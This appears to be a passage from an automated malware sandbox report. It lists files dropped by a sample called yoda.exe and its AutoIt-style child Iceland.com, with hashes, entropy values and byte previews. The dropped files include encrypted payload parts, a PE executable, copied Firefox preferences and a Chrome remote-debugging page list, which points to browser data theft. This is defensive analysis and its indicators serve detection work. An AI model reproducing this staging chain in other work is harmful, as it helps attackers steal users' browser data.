                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8193
                                                                                                                                                                                                                                                              Entropy (8bit):5.027484893998515
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
                                                                                                                                                                                                                                                              MD5:2D6ACF2AEC5E5349B16581C8AE23BF3E
                                                                                                                                                                                                                                                              SHA1:0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
                                                                                                                                                                                                                                                              SHA-256:B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
                                                                                                                                                                                                                                                              SHA-512:7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\UAS0ZU

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):9571
                                                                                                                                                                                                                                                              Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                              MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                              SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                              SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                              SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                              C:\ProgramData\4EK6XL68GLNY\V3790H47G

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1787
                                                                                                                                                                                                                                                              Entropy (8bit):5.389067895342191
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:SfNaoCbLpTECb3fNaoCECOYfNaoCRCUfNaoC6kXG0UrU0U8C6kj:6NnCbLpTECbvNnCECOkNnCRCANnC6kX/
                                                                                                                                                                                                                                                              MD5:F99C44200CD63146D684576D8CD644F2
                                                                                                                                                                                                                                                              SHA1:27FBE2FA9457073FDD8D7C45E5196A0B903D5D42
                                                                                                                                                                                                                                                              SHA-256:6C674125229C8E60F70DA1B7E8AB320CC4D87F5677A208685632C4E8DD23BE9D
                                                                                                                                                                                                                                                              SHA-512:D947825C5CBD1A850B19370C0C31E41F622ADA0474CEEA88D35FEE950816D729E99D8B5BB56C87365CCC3294C09B73A4F46BF861BAD3B01BC88885B8E22DF1DB
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A7319E937CB4FD2150BE4151BC37604A",.. "id": "A7319E937CB4FD2150BE4151BC37604A",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A7319E937CB4FD2150BE4151BC37604A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/181648D054685C363A3D3DD666DFAA5A",.. "id": "181648D054685C363A3D3DD666DFAA5A",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/181648D054685C363A3D3DD666DFAA5A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\314782\A

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:COM executable for DOS
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):280253
                                                                                                                                                                                                                                                              Entropy (8bit):7.999290755493679
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:6144:KvIP512rv/OaxzhAHzb+o/p0lENGXQVPu:C616/OVLWlEN8QNu
                                                                                                                                                                                                                                                              MD5:DCB63E0DAA1F10E37B1765C94317E960
                                                                                                                                                                                                                                                              SHA1:ABA56DDB75B5BE0CC9F6DD8781EBD352A78464FD
                                                                                                                                                                                                                                                              SHA-256:4AE6452A70EB3664BB35656040EB4E54DF016F1FCB5F1D31169F84AB854C9157
                                                                                                                                                                                                                                                              SHA-512:C07784B006E45FC36A5C6A95F2866FB514946744CAB72825C017DB972BEF2DA33123D2FE99FE61BF126E84D17020EC492AF2B92F884F35C2F4B3BEC81507F458
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..^...Q.._n.D.+\.ua._$...b..F......_.M."...*.........Y...~ld.....Q....>.VD...}.GX...Z.....f.B:.P.+.6.SCd..........u|H4......)...y=-..`n.T,.Z...e.%.O....b.z5;)..5...u.p'.A.!yo.B..W)4n ........$.,.NkvT'.}...X..w.j...E..w...*w.sU..u=...G.dR.N.+.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R~...0.8.'.F...h..............R...\Y..R...\Y.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W....j..........&.R....T..R...\Y.m........r..5...x..2).U.j....R>.l#.~...........h...|.@=.h....jX.4s)<.G...u...'......]q...WQ......L.a.$g...]..e.(.x .}.c..T2.x..%.B.'.r.....<...i..7J.K...7^ .SSX.s..E9-..O..-...V=.C.(x..k.^.....B....^.p5..Z.4p"5.@..t%..YN......jT...2..P(4.{|.?>|...

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\314782\Iceland.com

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                              Size (bytes):947288
                                                                                                                                                                                                                                                              Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                              MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Begun

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):100352
                                                                                                                                                                                                                                                              Entropy (8bit):6.2446902061366485
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:Cg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3Y:V5vPeDkjGgQaE/Y
                                                                                                                                                                                                                                                              MD5:1B4522B95D81397CA5A2210553445BBF
                                                                                                                                                                                                                                                              SHA1:9A91B54BE1C358C2EFE36119DA1A9A866C68379D
                                                                                                                                                                                                                                                              SHA-256:1BAC82F93DD185119FFF14EC929D0B9F6AF549985B6B76263F582EA79AC73EA8
                                                                                                                                                                                                                                                              SHA-512:E289FD7F59A35C1D94090A971463AA8F0B45CB24D29700D5B13BC564FC175235DE22E448C578BAC44E5FF114D89D0650455AD2A1BF669998776B306D0284508F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Cab

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60416
                                                                                                                                                                                                                                                              Entropy (8bit):6.6948814947574045
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:vkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+5:MaW2UDQWf05mjccBiqXvK
                                                                                                                                                                                                                                                              MD5:4268C94743989D2335905A72A7BBDEC4
                                                                                                                                                                                                                                                              SHA1:72171D2F7D0AF48F3DCF54DC12E7A7E52D8D5213
                                                                                                                                                                                                                                                              SHA-256:39B58D7B0D2AA7782A2606F2062EE68445FD285714C81C650FCC3AE27954991B
                                                                                                                                                                                                                                                              SHA-512:0F3A3A13A801EA4EBA0931A1F1188C8F9CF026E439B9FFF8EE568079AF13CF6586BF68878581EB221BD35B33AA51BEDAF6A3C92891AFAD0E8E539FAB5062C683
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..M.........M.........M.........M.....f....M.......M.l.J.....M..2I.....M.........M.........M.........M.....f....M.......M.\.I...(.M.G3I...,.M.......0.M.......4.M.......8.M.....f..<.M.....@.M...I...L.M..3I...P.M.......T.M.......X.M.......\.M.....f..`.M.....d.M...I.hH5M...p.M..3I...t.M.......x.M.......|.M.........M.....f....M....?f......D5M.;.......Q...hD5M..kf......=D5M....7...hD5M.........f..........U..QQ.E..@....A....tB...t9...........VQQ..$..^...u.......]...F...E.3....F.....^.....)......U..QQ.E..@....A....tB...t9...........VQQ..$.6]...u.......]..F...E.3....F.....^.....)......U....S.].V..W.}.........O...........j._...f9x..}.t~.e...E..e....j.PSW.E.......b.............P..U..|2...|2.u\.E.;.t...............E...E...P..w...U..|2...D2.u0.M..@....E...E....H....j.Yf9H...v..._^[......8.@8..U....S.].3.V.u...M.E.E.W....t.8....M......;.r..}.3.A;.v..<....8......;.r.E.u..E..]..E..E...y.....L..]..E...E..._^[...E..]..E......@..]..E.... K....@..]..}.......Au.........A................Au......

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Comparison

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):139264
                                                                                                                                                                                                                                                              Entropy (8bit):5.6726042666483805
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:PuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPR:mq8QLeAg0Fuz08XvBNbjaAtsPR
                                                                                                                                                                                                                                                              MD5:D696BFE9F1FFE666DCB77F0E29521543
                                                                                                                                                                                                                                                              SHA1:C9107E51987522C3B19750177BC256196A3D5195
                                                                                                                                                                                                                                                              SHA-256:6F79CAA6B24CB7A63C6D8D4A44BECFB2BEA6442185BB9249128A450C6ABD6DF3
                                                                                                                                                                                                                                                              SHA-512:13C9167962106EBEB9D3823DA689370E82A30D66CF6EC241AEFB35D0D3D68917C42DC5F61CC076FC0AD4557176286E2CD03A030BACA022CF8D40A5C81783278B
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:R.O.G.R.E.S.S...G.U.I.C.T.R.L.C.R.E.A.T.E.T.R.E.E.V.I.E.W...G.U.I.C.T.R.L.C.R.E.A.T.E.G.R.A.P.H.I.C.....S.T.R.I.N.G.F.R.O.M.A.S.C.I.I.A.R.R.A.Y.....O.N.A.U.T.O.I.T.E.X.I.T.R.E.G.I.S.T.E.R.....G.U.I.C.T.R.L.C.R.E.A.T.E.T.A.B.I.T.E.M.....G.U.I.C.T.R.L.S.E.T.D.E.F.B.K.C.O.L.O.R.....I.N.I.R.E.A.D.S.E.C.T.I.O.N.N.A.M.E.S...G.U.I.C.T.R.L.C.R.E.A.T.E.B.U.T.T.O.N...D.L.L.C.A.L.L.B.A.C.K.R.E.G.I.S.T.E.R...G.U.I.C.T.R.L.C.R.E.A.T.E.U.P.D.O.W.N...G.U.I.C.T.R.L.C.R.E.A.T.E.S.L.I.D.E.R...S.T.R.I.N.G.R.E.G.E.X.P.R.E.P.L.A.C.E...O.B.J.C.R.E.A.T.E.I.N.T.E.R.F.A.C.E.....G.U.I.C.T.R.L.S.E.N.D.T.O.D.U.M.M.Y.....F.I.L.E.C.R.E.A.T.E.S.H.O.R.T.C.U.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.I.N.P.U.T.....S.O.U.N.D.S.E.T.W.A.V.E.V.O.L.U.M.E.....F.I.L.E.C.R.E.A.T.E.N.T.F.S.L.I.N.K.....G.U.I.S.E.T.A.C.C.E.L.E.R.A.T.O.R.S.....G.U.I.C.T.R.L.C.R.E.A.T.E.C.O.M.B.O.....G.U.I.C.T.R.L.S.E.T.D.E.F.C.O.L.O.R.....P.R.O.C.E.S.S.S.E.T.P.R.I.O.R.I.T.Y.....G.U.I.C.T.R.L.S.E.T.R.E.S.I.Z.I.N.G.....S.T.R.I.N.G.T.O.A.S.C.I.I.A.R.R.A.Y.....

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Dedicated

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):92160
                                                                                                                                                                                                                                                              Entropy (8bit):4.333762844539525
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:rKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qc/:rKaj6iTcPAsAhxjgarB/5el3EYr8
                                                                                                                                                                                                                                                              MD5:DB0EC43385F3DEEE406B5415CD6FA773
                                                                                                                                                                                                                                                              SHA1:AB2A645A996DE0A55B9C6923C98843578FD98ACF
                                                                                                                                                                                                                                                              SHA-256:E787120C432605763582DABE1B5EBDF05FE28C6A6A224709B0077CBF14E03EEE
                                                                                                                                                                                                                                                              SHA-512:CBF5E56BCBE7DB45192A7FFAB0CD9BE9C18D21BAA05FD25B2FAC0F9070F104030C47DE4D542A7E79BE6FB3ACFBC5E83F199353DF4E0A705D10A5864FA7731D2B
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:............................r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.........................r.r.r.r.................................................................................................................r.r.r.r.r.r.r.r.....................r.r.r.r.r.r.................................................................................r.r.r.r.r.r.r.r.............................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...............................................................................................................................................................................r.r.r.

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Interview

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2532
                                                                                                                                                                                                                                                              Entropy (8bit):5.354250764303636
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:h9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+K:LSEA5O5W+MfH5S1CqlVJcIg
                                                                                                                                                                                                                                                              MD5:6B02B5EE03B56BF046BC2774FF57620E
                                                                                                                                                                                                                                                              SHA1:8D6298FC56EBF7EFE5A667D82FD354AE72FF419A
                                                                                                                                                                                                                                                              SHA-256:AAB8F4CF127AD72978835377FF7F04107C766E0445F8DDB1D712D093C143D13A
                                                                                                                                                                                                                                                              SHA-512:606A7E949019032FD25D84E66B52DCF6151C500854F32D384C3F29DD04A9528ED4E71ABBFB793E79C8654DAAB0C3AB910F219C35E17A85D8FD0739AD7FF3C970
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:INSPIRED........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Iso

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):84992
                                                                                                                                                                                                                                                              Entropy (8bit):7.997648763107784
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:XxVatTQ6Xytoe88Bu9+ERGvcUU7Jf3hGeHKK8c/S9B/AoHb/+KjD:Xjmxzh3RlRfOcK9B/AoH7+cD
                                                                                                                                                                                                                                                              MD5:0E220B159F97DBBF474BD4ABCBE60B28
                                                                                                                                                                                                                                                              SHA1:86658FB30A15CE54B0DE5FD33B49ABC71C8F036E
                                                                                                                                                                                                                                                              SHA-256:A3CC005EBF0DE6B5FE41FC5504C4B8EEAA7D4A946B57594D56F11DE605914C90
                                                                                                                                                                                                                                                              SHA-512:C9673623ED75B81B6F2C7C72EEC11283F45D935812B6635E351E7D9BEB4A1CED0F23DE9813C65A0E0D7B31B0DD9B6BD94D2ED55D3ED3B0C04704F6F40BB7D1C0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:. .l..E.1......e[Rv....".. ....Q...C.....m.eU..R.....4..'\.`$.|.z[.O\.......fn..`.~P......5.....v.......".D|..L.b.(...u.b.3...%.......:....I~..7...... ....G....j[h...f.N.....\...Ml.[Zn.=f?..._a..n..s.t.upcY.Yq.?....,.M.....M.w.C.Z....J.g.....C..$.46q..q..:....0<...J..Q....O.!x..?.A}.vXe.Z...:.|....K.X..*C..P....}I...O.m.n...1./.(.=.k..&Ak..vIo.9.}...?S...*o6X7.|S...*.h..gW...q8.n...XGS.....$.*.......`/.`..I.....ko.....}.\..LV.En.]!.w..Qu\......zA`-..q..........!........,...jX.%......u.].:.+.......mD.."..*hI..F{._Z..30n.tW!.C7..B...Q.Z.UI..~.P.[7...`i..v*.....H:...^gh....1.@...b.i.4..:|.^<.../.b....a1<.s.*..N...V.....r,v.w$?.Hmj.........8........O.n...5......^._k..M.x..^[s..1..~..Q.).D.6...:}......5..y%Ir...t.zt.....<tg...M..w. ..<U.%.:C...].Y>..W5....-]qXB#...?.V...M8/]%..Q..\u.'..).........#.,.z.{Q]1.'..\..b.#....N........~..].....C.f..I..&.M.D.[w..i....T.1...K.q...:..S."]..P...kic..j.C.......j...l.#.. .^z]sY....

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Lately

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):108544
                                                                                                                                                                                                                                                              Entropy (8bit):6.712735553229447
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:j6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVb:cdTmRxlHS3NxrHSBRtNPnj0nEoXnmm
                                                                                                                                                                                                                                                              MD5:0982457BBE3A894593EA6D9412C384D5
                                                                                                                                                                                                                                                              SHA1:145FCB779C2F2345D0A7EC899F1017AB4CA8985D
                                                                                                                                                                                                                                                              SHA-256:67D0216BC5041C505B069EE603F5F23C2D3B421BBB295E98B57613F5FDB3C4B1
                                                                                                                                                                                                                                                              SHA-512:CA31FBB3B355C56E395B3FBF51E08201D28DA5D6A8928A879B3D73CCC23C9086260DC6DAE99E476CCF0CAD6586780E80510680AF44F10D56D3ACF1EFBB51D7E2
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.........@.............D...D..D...D.c.D.<.D...................I.}.D.f.D...D..D..D...D.A.D.A.D..D.u.@...D.}.D...D...............................................D..D.........B.D...D...............D..D...............D..D...D.<.D..D...D.C.D.C.D.{.D.;.D..D.Z.D...D...............................................D...D...D.H.D...D...D.D.D.$.D.z.D.p.D.p.D...D.Y.D.3.D...D...D...D.+.D.w.D...D...D.Y.D.\.D...D._.D.p.D.p.D.z.D...D...D.*.D...D...D.R.D.B.D...D...D.R.D...D...D.{.D.;.D...D.&.D...D...............................................D.m.D...D.u.D...D.}.D.&.D...D.D.D.p.D.p.D...D.W.D.W.D.Q.D.Q.D...D.*.D.s.D...D...D.E.D.=.D...D...D.p.D.p.D.o.D.*.D...D.D.D...D...D...D.}.D.U.D.%.D...D...D...D.>.D.'.D...D...D...D...............................................D...D...D.).D.J.D.k.D..@..@..@.p.D.p.D...D.9.D...D.Q.D...D...D...D...D...D...D.*.D.d.D.E.D.E.D.p.D.p.D...D...D...D.*.D.l.D.Hj........Y.......G..F...u.j.X........3.G.j.Z.........Q.....Y...s......&....G...+..E....P..qPQ........)w...

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Luther

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):27325
                                                                                                                                                                                                                                                              Entropy (8bit):7.99262325896768
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:768:fyAe9CX0UkYoDhmfjGd7cwbfnTWC8AIukUNM:KAe9Q0SokfwYwTnTWCVIukUe
                                                                                                                                                                                                                                                              MD5:7C0DC95463E8F2EAEAA833B21B1D3721
                                                                                                                                                                                                                                                              SHA1:E49710DD4BD2E8DD5EDC0B9CE0672C1616A9D5C7
